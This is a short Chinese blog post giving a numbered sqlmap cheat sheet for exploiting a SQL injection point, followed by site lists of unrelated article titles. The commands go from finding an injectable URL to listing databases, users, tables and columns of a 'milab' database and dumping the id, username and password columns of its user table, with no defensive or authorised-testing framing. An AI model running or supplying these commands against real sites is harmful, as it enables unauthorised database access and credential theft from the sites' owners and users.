1. 找到注入点url
2. sqlmap -u url -v 1--dbs
列出数据库
或者 sqlmap -u url -v 1 --current-db
显示当前数据库
3. sqlmap -u url -v 1 --users
列出数据库用户
--current-user当前数据库用户
4. sqlmap -u url -v 1 --tables -D "milab"
列出milab数据库的表
5. sqlmap -u url -v 1 --columns -T "user" -D "milab"
列出milab数据库user表的列
6. sqlmap -u url -v 1 --dump -C "id,username,password" -T "user" -D "milab"
列出milab数据库user表的id,username,password这几列的数据
还可以加参数--start 1 --stop 100 就是显示前100条

最新文章

1. 0.[WP Developer体验Andriod开发]之从零安装配置Android Studio并编写第一个Android App
2. js 获取时间 new Date()详细介绍
3. Spark Streaming 数据接收过程
4. 根据一个旅游网站的psd素材还原的静态页面
5. 如何显示Mac OS X上的隐藏文件和文件夹
6. TCP/IP三次握手，四次断开
7. angular2+ 组件中用@import进来的css不起作用
8. Hadoop API：遍历文件分区目录，并根据目录下的数据进行并行提交spark任务
9. python3 迭代器（Iterator）和生成器（generator）
10. CIFAR-10数据集图像分类【PCA+基于最小错误率的贝叶斯决策】
11. 31Spring的一些想法
12. idea搭建Eureka注册中心
13. .net core Jenkins持续集成Linux、Docker、K8S
14. java 异常历史 和观点
15. sign和token设计
16. 如何设置VMware中Linux命令行环境全屏
17. Struts2_day04--自定义拦截器_Struts2的标签库_表单标签
18. hackerrank Project Euler #210: Obtuse Angled Triangles
19. 发现的好东西——bitset
20. react-native 极光推送（jpush-react-native）

热门文章

1. 最短路径之迪杰斯特拉算法（Java）
2. B1081 检查密码 （15分）
3. 笔记-Python-language reference-5.the import system
4. python读取文件
5. 发送广播重新挂载SD卡，使图库可以及时显示自己保存的图片（无需手机重启）
6. shell脚本递归删除空文件夹
7. iOS笔记060 - 自定义控件
8. time模块与random模块，六位含字母随机验证码
9. Android 图片文字单位 px、dp、sp区别
10. 转载：PHP 协程实现